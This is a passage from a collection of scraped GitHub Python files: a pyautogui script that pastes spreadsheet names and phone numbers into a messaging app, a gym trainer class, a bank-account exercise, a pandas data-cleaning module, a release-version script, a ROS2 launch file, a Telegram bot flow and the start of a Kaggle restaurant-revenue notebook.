encoding=\"UTF8\")\n config2 = ConfigObj(\"./config/坐标配置.ini\", encoding=\"UTF8\")\n zblen = config2['len']['all']\n value = config1['BG']\n bgpath = value['1']\n if not os.path.exists(bgpath):\n pyautogui.alert(text='没有找到表格文件~', title='警告', button='OK')\n self.stop()\n farenLie = value['2']\n sjhLie = value['3']\n kaishi = value['4']\n jieshu = value['5']\n xingxi = str(value['7']) + str(value['8'])\n kongge = ' ' * int(value['9'])\n gongsi = value['10']\n needgongsi = str(config1['BG2']['1'])\n pbpath = str(config1['BG2']['2'])\n workbook = openpyxl.load_workbook(bgpath)\n sheet = workbook.worksheets[0]\n i = int(kaishi)\n while self.__running.isSet():\n if i <= int(jieshu):\n farenName = str(sheet.cell(row=i, column=int(farenLie)).value)\n phoneNum = str(sheet.cell(row=i, column=int(sjhLie)).value)\n companyName = str(sheet.cell(row=i, column=int(gongsi)).value)\n resPaiban = paiban(pbpath,companyName)\n if len(farenName) == 2:\n farenName = farenName[0] + kongge + farenName[1]\n for j in range(0, int(zblen)):\n index = str(j + 1)\n x = config2['X'][index]\n y = config2['Y'][index]\n event = config2['event'][index]\n sleepNum = config2['sleep'][index]\n copytext = str(config2['copy'][index])\n if '>法人的姓+' in copytext:\n wb = farenName[0]+copytext.split('+')[1]\n pyperclip.copy(wb)\n elif copytext == '>法人':\n pyperclip.copy(farenName)\n elif copytext == '>电话':\n pyperclip.copy(phoneNum)\n elif copytext == '>彩信内容':\n caixing = farenName[0] + xingxi\n pyperclip.copy(caixing)\n elif copytext == '>字号':\n if needgongsi == '是':\n zihao = resPaiban[1]\n pyperclip.copy(zihao)\n elif copytext == '>公司名称':\n if needgongsi == '是':\n companyName = resPaiban[0]\n pyperclip.copy(companyName)\n elif copytext == '无':\n pass\n else:\n pyperclip.copy(copytext)\n # 执行自动\n if self.__running.isSet():\n autoFun(int(x), int(y), event, float(sleepNum))\n # 保存已经执行并且保存从第几行开始 i++对下一个数据进行操作\n value['4'] = i\n value['6'] = i\n config1.write()\n i = i + 1\n if i >= int(jieshu) + 1:\n pyautogui.alert(text='执行完毕', title='提示', button='OK')\n self.stop()\n\n def pause(self):\n self.__flag.clear() # 设置为False, 让线程阻塞\n\n def resume(self):\n self.__flag.set() # 设置为True, 让线程停止阻塞\n\n def stop(self):\n self.__flag.set() # 将线程从暂停状态恢复, 如果已经暂停的话\n self.__running.clear() # 设置为False\n\n def killme(self):\n stop_thread(self)\n\n\n########自动化函数\n###自动化执行判断\ndef autoFun(x, y, event, sleepNum):\n time.sleep(sleepNum)\n if event == '鼠标左键双击':\n pyautogui.doubleClick(x=x, y=y, button=\"left\")\n elif event == '鼠标左键单击':\n pyautogui.click(x=x, y=y)\n elif event == '鼠标右键单击':\n pyautogui.click(x=x, y=y, button='right')\n elif event == '鼠标移动到':\n pyautogui.moveTo(x, y)\n elif '>' in event:\n keywords = str(event).replace('>', '')\n lists = keywords.split('+')\n for i in lists:\n time.sleep(0.2)\n pyautogui.keyDown(i)\n for i in lists:\n time.sleep(0.2)\n pyautogui.keyUp(i)\n else:\n pass\n\n##########\n### 公司名称排版\ndef paiban(path, faren):\n f = open(path, 'r', encoding='utf-8')\n pblist = []\n cnt = 0\n zuida = 0\n resstr = ''\n zihao = ''\n for i in f:\n if cnt == 0:\n zuida = int(i.split('|')[1])\n zihao = int(i.split('|')[3])\n cnt += 1\n else:\n sp = i.replace('\\n', '').split('|')\n pblist.append(sp)\n cnt = 0\n flag = False\n for i in pblist:\n if len(i[1].replace(' ', '')) == len(str(faren)):\n zihao = i[2]\n for k in i[1]:\n if k != 'A':\n resstr += k\n else:\n resstr += faren[cnt]\n cnt += 1\n flag = True\n break\n if flag:\n break\n if not flag:\n resstr = faren\n if len(str(resstr))>zuida:\n resstr = resstr[0:zuida]\n f.close()\n return [resstr, int(zihao)]","repo_name":"AJAskr/Ps-SendSSM","sub_path":"Ps-SendSSM/aotuJob.py","file_name":"aotuJob.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"7462549854","text":"from User import User\nfrom CustomerDatabase import customer_database\nfrom EmployeeSchedule import employee_schedule\nfrom pprint import pprint\n\nclass Trainer(User):\n def __init__(self, name, email, password):\n User.__init__(self, name, email, password, 'trainer')\n\n '''\n ----------------------------------------------------------------------------\n update_customer_bench_press function\n requests input of customer's name and new bench press weight to change that\n customer object's bench press weight\n '''\n def update_customer_bench_press(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_bench_press = input('Updated Bench Press Weight:\\n')\n customer_database.individuals[name].training_progress.update_bench_press(new_bench_press)\n\n '''\n ----------------------------------------------------------------------------\n update_customer_bench_press_goal function\n requests input of customer's name and new bench press goal weight to change that\n customer object's bench press goal weight\n '''\n def update_customer_bench_press_goal(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_bench_press_goal = input('Updated Bench Press Weight Goal:\\n')\n customer_database.individuals[name].training_progress.update_bench_press_goal(new_bench_press_goal)\n \n '''\n ----------------------------------------------------------------------------\n update_customer_squat function\n requests input of customer's name and new squat weight to change that\n customer object's squat weight\n '''\n def update_customer_squat(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_squat = input('Updated Squat Weight:\\n')\n customer_database.individuals[name].training_progress.update_squat(new_squat)\n '''\n ----------------------------------------------------------------------------\n update_customer_squat_goal function\n requests input of customer's name and new squat goal weight to change that\n customer object's squat goal weight\n '''\n def update_customer_squat_goal(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_squat_goal = input('Updated Squat Weight Goal:\\n')\n customer_database.individuals\n \n '''\n ----------------------------------------------------------------------------\n update_customer_mile_time function\n requests input of customer's name and new mile time to change that\n customer object's mile time\n '''\n def update_customer_mile_time(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_time = input('Updated Mile Time:\\n')\n customer_database.individuals[name].training_progress.update_mile_time(new_time)\n\n '''\n ----------------------------------------------------------------------------\n update_customer_mile_time_goal function\n requests input of customer's name and new mile time goal to change that\n customer object's mile time goal\n '''\n def update_customer_mile_time_goal(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_time_goal = input('Updated Mile Time Goal:\\n')\n customer_database.individuals[name].training_progress.update_mile_time_goal(new_time_goal)\n\n '''\n ----------------------------------------------------------------------------\n update_customer_weight function\n requests input of customer's name and new weight to change that\n customer object's current weight\n '''\n def update_customer_weight(self):\n name = input('Customer Name:\\n')\n name = name.lower()\n new_weight = input('Updated Customer Weight:\\n')\n customer_database.individuals[name].training_progress.update_weight(new_weight)\n\n '''\n ----------------------------------------------------------------------------\n display_customer_progress function\n requests input of customer's name and calls the training_progress class to use\n the display_training_progress function and display the customer object's stats\n '''\n def display_customer_progress(self):\n customer_name = input('Customer Name:\\n')\n customer_name = customer_name.lower()\n\n if customer_name in customer_database.individuals.keys():\n customer_database.individuals[customer_name].training_progress.display_training_progress()\n else:\n print('Customer not recognized.')\n \n '''\n ----------------------------------------------------------------------------\n display_my_schedule function\n display's the current employee's schedule based on the name of the employee\n '''\n def display_my_schedule(self):\n employee_schedule.display_employee_schedule(self.name)\n","repo_name":"chloelfr/SoftwareEngineeringProjet","sub_path":"panther-fitness-master/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19069639095","text":"class Account:\n def __init__(self, owner, balance):\n self.owner = owner\n self.balance = balance\n def deposit(self, amount):\n self.balance = amount + self.balance\n print(f\"Deposit accepted! \\nYour new balance is {self.balance}\\n\")\n def withdraw(self, amount):\n if not amount > self.balance:\n self.balance = self.balance - amount\n print(f\"Withdrawal accepted! \\nYour new balance is {self.balance}\\n\")\n else:\n print(\"Funds unavailable! \\nSorry, the amount you want to withdraw exceeds your available balance!\")\n def __str__(self):\n return f\"Account owner: {self.owner} \\nAccount balance: {self.balance}\\n\"\n\n\nacct1 = Account('Jose', 100)\nprint(acct1)\nacct1.deposit(50)\nacct1.withdraw(75)\nacct1.withdraw(500)\n","repo_name":"deji-dd/Python_Bootcamp","sub_path":"35: Object Oriented Programming Challenge.py","file_name":"35: Object Oriented Programming Challenge.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18796302721","text":"\"\"\"\nThis is a module that houses all the pandas data manipulation process, including cleaning, encoding, \nshape changing, and more. The purpose of separating the following functionalities, is to ensure the code \nis reusable, and to support scalable future projects. Each sub-class is a particular view for a specific \nusage. (e.g. feed_data_decision_tree is a machine learning model ready setup)\n\"\"\"\n\n# Importing libraries\nimport pandas as pd\nfrom pandas.api.types import is_string_dtype\nfrom pandas.api.types import is_numeric_dtype\nimport numpy as np\n\nimport os\nimport glob\nfrom datetime import datetime \n\n\n\ncleaningDict = {\n '64150, MO' : 'RIVERSIDE, MO',\n '95678, CA' : 'ROSEVILLE, CA',\n '15801, PA' : 'DUBOIS, PA'\n}\n\n\"\"\"\nInitiating all the reference data first for usages. Creating a reference data for cleaning zip code manually for now\nsince we don't have an approved API for this project.\n\"\"\"\n\nbinary_encoding_map = {\n 'Y' : 1,\n 'N' : 0,\n 'Engaged' : 1,\n 'Not engaged' : 0\n}\n\n\"\"\"\nIntiating the mapping for conversion\n\"\"\"\n\ndriver_columns = [\n 'email_open', 'web_visit', \n 'webcast_attendee', 'marketing_engaged'\n ]\n\n\"\"\"\nCreating a binary column list for ease of usages\n\"\"\"\n\n#Creating all the data loading methods\n# Defining data loading functions\n\ndef read_file(data_file):\n \"\"\"\n Function to read one data file with the custom setup\n \"\"\"\n df = pd.read_csv(data_file, delimiter=\";\")\n return df\n\ndef read_all_files(data_folder):\n \"\"\"\n Function to get all the data files of a target type, and\n \"\"\"\n # Scanning for all the data files\n dataPaths = glob.glob(data_folder + \"/*.txt\")\n\n # Loading in the data\n listOfFrames = []\n for i in dataPaths:\n tdf = pd.read_csv(i, sep=\";\")\n tdf['source_file'] = i # Adding source file as a column for ease of tracking\n listOfFrames.append(tdf)\n \n # Combining all the dataframes\n df = pd.concat(listOfFrames, ignore_index=True)\n return df\n\n\n# Using a dictionary to map input methods\ninput_methods = {\n 'txt' : read_file, # if it's a txt file, just use read csv\n '' : read_all_files # if it's a directory, use glob to read everything\n}\n\n\nclass house_of_data(object):\n \"\"\"\n Collection of data with each method as a stage of data manipulation process or metrics output.\n \"\"\"\n\n def __init__(self, DataInput):\n # first validating the input to see which method to use\n inputType = os.path.splitext(DataInput)[-1]\n if inputType == \".txt\":\n read_method = input_methods.get('txt')\n else:\n read_method = input_methods.get('')\n\n # Actually initiating the object attributes\n self._DataInput = DataInput\n self._RawData = read_method(DataInput)\n\n def cleaning(self):\n \"\"\"\n Performing all the cleanings related to this dataset\n \"\"\"\n df = self._RawData.drop_duplicates().copy() #Creating a copy of the drop_dup dataframe\n # Run a for-loop to go through string columns\n # and strip the leading and trailing whitespaces\n\n for i in df.columns:\n if is_string_dtype(df[i]): # if it's a string column\n df[i] = df[i].str.strip() # strip out the white spaces\n else:\n pass\n \n # resetting index after the drop duplicates\n df = df.reset_index(drop=True)\n\n # Cleaning up the duplicated states in cell\n df['city_state'] = df['city_state'].str.replace(\"WASHINGTON, DC, DC\", \"WASHINGTON DC, DC\")\n df['city_state'] = df['city_state'].str.replace(\"KNOXVILLE, TN, TN\", \"KNOXVILLE, TN\")\n\n # Performing the zip code cleaning\n df['city_state'] = df['city_state'].replace(cleaningDict)\n\n # Saving it to the object\n self._clean_df = df\n\n def other_data_validations(self):\n \"\"\"\n Ensure new incoming data does not have new violations or needed updates.\n \"\"\"\n checker = []\n # Checking if the broker ID is number\n checker.append(is_numeric_dtype(self._clean_df['broker_name'].str.split(\"Broker\", expand=True)[1].astype(float)))\n # Checking if the broker name is correct\n checker.append(len(self._clean_df['broker_name'].str.split(\"Broker\", expand=True).columns) == 2)\n # Checking if the city states only has one comma\n checker.append(len(self._clean_df['city_state'].str.split(\", \", expand=True).columns) == 2)\n # Checking if the city state column contains numbers (zip codes)\n mask = self._clean_df['city_state'].str.split(\", \", expand=True)[0].str.isnumeric()\n checker.append(len(self._clean_df[mask]) == 0)\n # Checking if thet prefix is a character per describe\n mask1 = self._clean_df['territory'].str[0].str.isalpha() == False\n mask2 = self._clean_df['territory'].str[0] != \"I\"\n mask3 = self._clean_df['territory'].str[0] != \"W\"\n checker.append(len(self._clean_df.loc[mask1, 'territory']) == 0)\n checker.append(len(self._clean_df.loc[mask2&mask3, 'territory']) == 0)\n # Checking fund category column\n mask4 = self._clean_df['fund_category'].str.isnumeric() == True\n checker.append(len(self._clean_df.loc[mask, 'fund_category']) == 0)\n checker.append(is_numeric_dtype(self._clean_df['firm_x_sales']))\n checker.append(is_numeric_dtype(self._clean_df['total_industry_sales']))\n\n # Checking binary columns\n bin_check = True\n for i in driver_columns:\n if len(self._clean_df[i].unique()) == 2:\n pass\n else:\n bin_check = False\n print(f\"{i} is not binary\")\n break\n\n checker.append(bin_check)\n\n return checker\n\n\n def enrichment(self):\n \"\"\"\n Built on top of the clean_df, this is going to split out the analytics\n columns\n \"\"\"\n # Creating a copy of the clean dataframe for enrichment\n self.cleaning()\n df = self._clean_df.copy()\n\n # Binary encode all the binary categorical variables\n df[driver_columns] = df[driver_columns].replace(binary_encoding_map)\n \n # Splitting out the sates since the city_state information is too granular for overview\n df['state'] = df['city_state'].str.split(\", \", expand=True)[1]\n \n # Splitting out the Channel\n df['i_or_w'] =df['territory'].str[0]\n I_OR_W = {\n \"I\" : 1,\n \"W\" : 0\n }\n\n df['i_or_w'] = df['i_or_w'].replace(I_OR_W)\n \n # Initiating a filter to exclude all the no sales generated record\n mask = df['firm_x_sales'] > 0\n significant_cut = df[mask]['firm_x_sales'].quantile(0.2)\n # Intiating a filter with the twenty percentile cut\n mask1 = df['firm_x_sales'] > significant_cut\n # Performing the filter and label\n df['effective_sale'] = 0\n df.loc[mask1,'effective_sale'] = 1\n \n # Since driver_columns are the same as driver columns\n # we will utilize that to create driver_pattern\n df['driver_pattern'] = df[driver_columns].apply(tuple,axis=1)\n \n df = df.reset_index(drop=True)\n # Save the enriched dataframe to the house\n self._enriched_df = df\n \n\n\n\n def get_metrics(self):\n \"\"\"\n Printing an output of quick metrics\n \"\"\"\n pass\n\n\n\n\nif __name__ == \"__main__\":\n import sys\n script, data_input = sys.args","repo_name":"spencertse122/BI_SalesChannel_Classifier","sub_path":"DataModels/models/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24910089079","text":"# -*- coding: utf-8 -*-\n\n\nsquares = [1, 4, 9, 16, 25]\n# print(squares)\n\na=1\nb=a\n\nref_squares = squares\nval_squares = squares[:] \n\n\n# ref_squares[0]=52\n# print(\"ref_squares\",ref_squares)\n# print(\"squares\",squares)\n\n# val_squares[0]=22\n# print(\"val_squares\",val_squares)\n# print(\"squares\",squares)\n\narr_1 = [1,2]\narr_2 = [3,4]\narr = [arr_1,arr_2]\nval_arr = arr[:] \narr_1[0]=22\nprint(\"arr\",arr)\nprint(\"val_arr\",val_arr)\nval_arr.append(7)\nprint(\"val_arr\",val_arr)\n\nletters = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\nletters[2:5] = ['C']\n\nprint(letters)","repo_name":"fgaurat/formationpython2","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15895110814","text":"#!/usr/bin/env python\n\nimport getopt, sys\nimport re\nimport subprocess\n\n\ndef usage():\n print(\n \"\"\"\n You can use the scripts as follows\n ./update-release.py -v v1.5.0\n \"\"\"\n )\n\n\ndef replace_on(file, pattern, new_value):\n with open(file, \"r+\") as file:\n content = file.read()\n new_content = re.sub(pattern, new_value, content)\n file.seek(0)\n file.write(new_content)\n\n\ndef replace_version_on_config_py(version: str):\n file_name = \"doc/source/conf.py\"\n replace_on(file_name, r\"release = '(\\d+).(\\d+).(\\d+)'\", f\"release = '{version}'\")\n\n\ndef replace_version_on_setup_py(version: str):\n file_name = \"setup.py\"\n replace_on(file_name, r\"version='(\\d+).(\\d+).(\\d+)'\", f\"version='{version}'\")\n\n\ndef replace_version_on_changelog_gen(version: str):\n file_name = \".github_changelog_generator\"\n replace_on(\n file_name, r\"future-release=v(\\d+).(\\d+).(\\d+)\", f\"future-release={version}\"\n )\n\n\ndef update_versiono_pyproject_toml(version: str):\n shell([\"poetry\", \"version\", version])\n\n\ndef shell(command):\n return subprocess.run(command, text=True)\n\n\ndef main():\n version = None\n try:\n options, args = getopt.getopt(sys.argv[1:], \"v:\", [\"version=\"])\n except getopt.GetoptError as err:\n # print help information and exit:\n print(err) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n for option, value in options:\n if option in (\"-v\", \"--version\"):\n version = value\n else:\n assert False, \"Unhandled option\"\n\n if not version:\n usage()\n sys.exit(2)\n\n version_number = version[1:] if \"v\" in version else version\n replace_version_on_setup_py(version_number)\n replace_version_on_config_py(version_number)\n replace_version_on_changelog_gen(version)\n update_versiono_pyproject_toml(version_number)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"didix21/mdutils","sub_path":"scripts/update-release.py","file_name":"update-release.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"18"} +{"seq_id":"29544889048","text":"from launch_ros.actions import Node\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument\nfrom launch_ros.substitutions import FindPackageShare\nfrom launch.substitutions import LaunchConfiguration, PathJoinSubstitution\n\ndef generate_launch_description():\n \n launch_args = [\n DeclareLaunchArgument(\n 'use_sim_time',\n default_value='false',\n description='Use simulation (Gazebo) clock if true'),\n\n DeclareLaunchArgument(\n 'cloud_in',\n default_value='velodyne_points',\n description='The topic on which to listen for the pointcloud data'\n ),\n\n DeclareLaunchArgument(\n 'config_file',\n default_value='octomap_params.yaml',\n description='The file within the /spot_navigation/config folder with which to look for params'\n ),\n ]\n\n octomap_server = Node(\n package=\"octomap_server\",\n executable=\"octomap_server_node\",\n name=\"octomap_server_node\",\n parameters=[\n PathJoinSubstitution([FindPackageShare('spot_navigation'), 'config', LaunchConfiguration('config_file')])\n ],\n remappings=[\n ('cloud_in', LaunchConfiguration('cloud_in'))\n ]\n )\n\n return LaunchDescription([\n *launch_args,\n octomap_server\n ])\n\n","repo_name":"Caleb-Horan/Spot_Manipulator_Optimization","sub_path":"install/spot_navigation/share/spot_navigation/launch/octomap.launch.py","file_name":"octomap.launch.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4446024279","text":"\"\"\"\n위쪽 대각선 오른쪽(dp[i-1][j-1]), 위쪽 대각선 왼쪽(dp[i-1][j]) 중\nmax를 이용하여 큰 값만 추출하고, 현재 위치의 값(triangle[i - 1][j - 1]) 을 더해주는 식으로 최대값을 찾음.\n-> sum[i][j] = max(sum[i-1][j-1],sum[i-1][j]) + tri[i-1][j-1]\n\nmax(dp[i - 1][j - 1], dp[i - 1][j]) 에서 IndexError를 방지하기 위해서.. 배열 크기를 n+1 크기로 정의하고 가장 위쪽에 padding을 추가하였고,\n실제 계산을 1부터 n+1까지(n번) 돌면서 계산하도록 구현하였다. 1부터 시작하기 때문에 triangle[i][j]가 아닌 triangle[i - 1][j - 1] 가 되었음.\n\n최종적으로 dp를 출력해보면 아래와 같다.\n[[0, 0, 0, 0, 0, 0], [0, 7, 0, 0, 0, 0], [0, 10, 15, 0, 0, 0], [0, 18, 16, 15, 0, 0], [0, 20, 25, 20, 19, 0], [0, 24, 30, 27, 26, 24]]\n\"\"\"\n\ndef solution(triangle):\n n = len(triangle)\n dp = [[0 for _ in range(n + 1)] for _ in range(n + 1)]\n for i in range(1, n + 1):\n for j in range(1, i + 1):\n dp[i][j] = max(dp[i - 1][j - 1], dp[i - 1][j]) + triangle[i - 1][j - 1]\n return max(dp[-1])\n\n\nt = [[7], [3, 8], [8, 1, 0], [2, 7, 4, 4], [4, 5, 2, 6, 5]]\nprint(solution(t))","repo_name":"prography-6th-study/algorithm-code","sub_path":"seongwoo/3-정수삼각형.py","file_name":"3-정수삼각형.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"13669028311","text":"from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom flows.callbacks import Callbacks\nfrom flows.main_menu import main_menu\nfrom models.User import User\nfrom planfix.planfix import create_club_task\n\nuser_dict = {}\nbot_dict = {}\n\nfirst_message = \"Правовой клуб – это сообщество профессиональных юристов и адвокатов, которые готовы обмениваться опытом друг с другом.\" \\\n \"\\n\\nПреимущества клуба:\" \\\n \"\\n\\n• Егор Редин делится запросами из СМИ для юристов и адвокатов\" \\\n \"\\n\\n• Егор рассказывает о своем опыте управления юридической фирмой\" \\\n \"\\n\\n• Егор передает клиентов, которых не успевает обработать самостоятельно\" \\\n \"\\n\\n• Мы организуем образовательные онлайн и крутые досуговые оффлайн встречи для членов клуба\" \\\n \"\\n\\n• Все образовательные продукты Егора Редина предоставляются членам клуба с 25% скидкой\" \\\n \"\\n\\nИ все это цене 3х чашек кофе в месяц!\"\n\n\ndef other_club():\n markup = InlineKeyboardMarkup()\n markup.row_width = 1\n markup.add(\n InlineKeyboardButton(\"Я с вами!\",\n callback_data=Callbacks.other_club_yes.name),\n InlineKeyboardButton(\"Главное меню\",\n callback_data=Callbacks.main_menu.name),\n )\n return markup\n\n\ndef other_club_handler(bot, call):\n chat_id = call.message.chat.id\n if call.data == Callbacks.other_club.name:\n bot.send_message(call.message.chat.id,\n first_message, reply_markup=other_club())\n if call.data == Callbacks.other_club_yes.name:\n user_dict[chat_id] = User(call.message.text)\n bot_dict[chat_id] = bot\n\n msg = bot.send_message(\n chat_id, \"Как я могу к вам обращаться? (напишите имя)\")\n bot.register_next_step_handler(msg, set_name)\n\n\ndef set_name(message):\n chat_id = message.chat.id\n name = message.text\n user = User(name)\n user_dict[chat_id] = user\n msg = bot_dict[chat_id].send_message(\n chat_id, \"Напишите ваш сотовый номер телефона. Если вы даете согласие на обработку персональных данных, то нажмите «Отправить»\")\n bot_dict[chat_id].register_next_step_handler(msg, send_request)\n\n\ndef send_request(message):\n chat_id = message.chat.id\n user = user_dict[chat_id]\n phone = message.text\n user.phone = phone\n # bot_dict[chat_id].send_message(\n # chat_id, \"Оплатить подписку 990 рублей в месяц\")\n create_club_task(user.name, user.phone)\n bot_dict[chat_id].send_message(\n chat_id, \"Спасибо за ваш интерес, мы с вами свяжемся в ближайшее время\")\n","repo_name":"AntonyHatchet/tg-bot","sub_path":"flows/other/other_club.py","file_name":"other_club.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2335851181","text":"import pika\n\n\nclass AmqpClientError(Exception):\n pass\n\n\ndef create_connection(queue_servers, queue_mode = \"rabbitmq_cluster\"):\n \n if queue_mode == \"rabbitmq_cluster\":\n \n credentials = pika.PlainCredentials('guest', 'guest')\n for address in queue_servers:\n addr, port = address.split(\":\")\n conn = pika.AsyncoreConnection(\n pika.ConnectionParameters(host=addr, port=int(port), credentials=credentials)\n )\n if conn.connection_open:\n return conn\n \n else:\n \n queue_address, queue_port = queue_servers[0].split(\":\")\n return pika.AsyncoreConnection(\n pika.ConnectionParameters(\n host=queue_address, port=int(queue_port),\n credentials=pika.PlainCredentials(\"guest\", \"guest\")))\n \n \ndef _create_callback(callback, queue_mode):\n\n def amqp_callback(ch, method, header, body):\n callback(body, method.routing_key, header)\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return amqp_callback\n \n\nclass AmqpClient(object):\n\n def __init__(self, conn):\n self.conn = conn\n self.chan = conn.channel()\n\n def exchange_declare(self, exchange, exchange_type, auto_delete=False):\n self.chan.exchange_declare(exchange=exchange, type=exchange_type, auto_delete=auto_delete)\n\n def queue_declare(self, qname, exclusive=False, durable=False):\n self.chan.queue_declare(queue=qname, exclusive=exclusive, durable=durable)\n\n def queue_bind(self, exchange, qname, binding_key=None):\n if binding_key is None:\n self.chan.queue_bind(\n exchange=exchange, queue=qname)\n else:\n self.chan.queue_bind(\n exchange=exchange, queue=qname,\n routing_key=binding_key)\n\n def publish(self, msg, exchange, routing_key=\"\", properties=None):\n kwargs = {\n \"exchange\": exchange,\n \"routing_key\": routing_key,\n \"body\": msg\n }\n if properties:\n kwargs[\"properties\"] = properties\n self.chan.basic_publish(**kwargs)\n\n def subscribe(self, callback, queue_name, queue_mode=\"rabbitmq_cluster\"):\n self.chan.basic_qos(prefetch_count=1)\n self.chan.basic_consume(_create_callback(callback, queue_mode), queue=queue_name)\n\n\ndef start(connections, count=100, timeout=1):\n socket_map = {}\n for conn in connections:\n socket_map[conn.dispatcher._fileno] = conn.dispatcher\n pika.asyncore_loop(socket_map, count=count, timeout=timeout)\n \n","repo_name":"appfirst/distributed_queue_manager","sub_path":"afqueue/common/amqpclient.py","file_name":"amqpclient.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71427154600","text":"# Data file\nimport numpy as np\nimport pandas as pd\nimport os\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n# Import\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport seaborn as sns \n\nfrom sklearn.svm import SVR\nfrom sklearn.svm import LinearSVR\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor # KneighborsRegressorではない\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import KFold\nfrom sklearn.linear_model import RANSACRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.linear_model import SGDRegressor\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.ensemble import VotingRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm import LGBMRegressor\nfrom catboost import CatBoostRegressor\ntrain = pd.read_csv('/kaggle/input/restaurant-revenue-prediction/train.csv.zip', header=0)\ntrain.head(10)\ntest = pd.read_csv('/kaggle/input/restaurant-revenue-prediction/test.csv.zip')\ntest.head(10)\nsubmission = pd.read_csv('/kaggle/input/restaurant-revenue-prediction/sampleSubmission.csv')\nsubmission.head(10)\ntrain_mid = train.copy()\ntrain_mid['train_or_test'] = 'train'\n\ntest_mid = test.copy()\ntest_mid['train_or_test'] = 'test'\n\ntest_mid['revenue'] = 9\n\nalldata = pd.concat([train_mid, test_mid], sort=False, axis=0).reset_index(drop=True)\n\nprint('The size of the train data:' + str(train.shape))\nprint('The size of the test data:' + str(test.shape))\nprint('The size of the submission data:' + str(submission.shape))\nprint('The size of the alldata data:' + str(alldata.shape))\ntrain.describe()\ntest.describe()\nalldata.describe()\n\nprint('=====Train=====')\ntrain.info()\nprint('\\n=====Test=====')\ntest.info()\n# Check for duplicates\nidsUnique = len(set(alldata['Id']))\nidsTotal = alldata.shape[0]\nidsDupli = idsTotal - idsUnique\nprint(\"There are \" + str(idsDupli) + \" duplicate IDs for \" + str(idsTotal) + \" total entries\")\n\n# Missing data in Alldata\ndef Missing_table(df):\n # null_val = df.isnull().sum()\n null_val = df.isnull().sum()[df.isnull().sum()>0].sort_values(ascending=False)\n percent = 100 * null_val/len(df)\n na_col_list = df.isnull().sum()[df.isnull().sum()>0].index.tolist() # 欠損を含むカラムをリスト化\n list_type = df[na_col_list].dtypes.sort_values(ascending=False) #データ型\n Missing_table = pd.concat([null_val, percent, list_type], axis = 1)\n missing_table_len = Missing_table.rename(\n columns = {0:'Missing data', 1:'%', 2:'type'})\n return missing_table_len.sort_values(by=['Missing data'], ascending=False)\n\nMissing_table(alldata)\n# EDA\n# Histogram\nalldata.hist(figsize = (12,12))\n# Heatmap. Understand feature related to survived\nfig, ax = plt.subplots(figsize=(15,15))\nsns.heatmap(train.corr(),annot=True, center=0, square=True, linewidths=0.1, vmax=1.0, linecolor='white', cmap=\"RdBu\")\nplt.title('Restaurant Revenue Prediction', fontsize = 20)\nplt.xlabel('x-axis', fontsize = 15)\nplt.ylabel('y-axis', fontsize = 15)\nalldata['City'].value_counts()\nalldata['City Group'].value_counts()\nalldata['Type'].value_counts()\nalldata['City'].replace(['İstanbul', 'Ankara', 'İzmir'], 0,inplace=True)\nalldata['City'].replace(['Bursa', 'Samsun', 'Antalya', 'Sakarya', 'Kayseri', 'Diyarbakır', 'Tekirdağ', 'Eskişehir', 'Adana', 'Aydın', 'Muğla', 'Konya', 'Trabzon', 'Amasya', 'Uşak', 'Kastamonu', 'Karabük', 'Kütahya', 'Bolu', 'Şanlıurfa', 'Edirne', 'Kırklareli', 'Afyonkarahisar', 'Osmaniye', 'Denizli', 'Tokat', 'Balıkesir', 'Gaziantep', 'Kocaeli', 'Elazığ', 'Isparta', 'Mersin', 'Manisa', 'Çanakkale', 'Hatay', 'Zonguldak', 'Aksaray', 'Yalova', 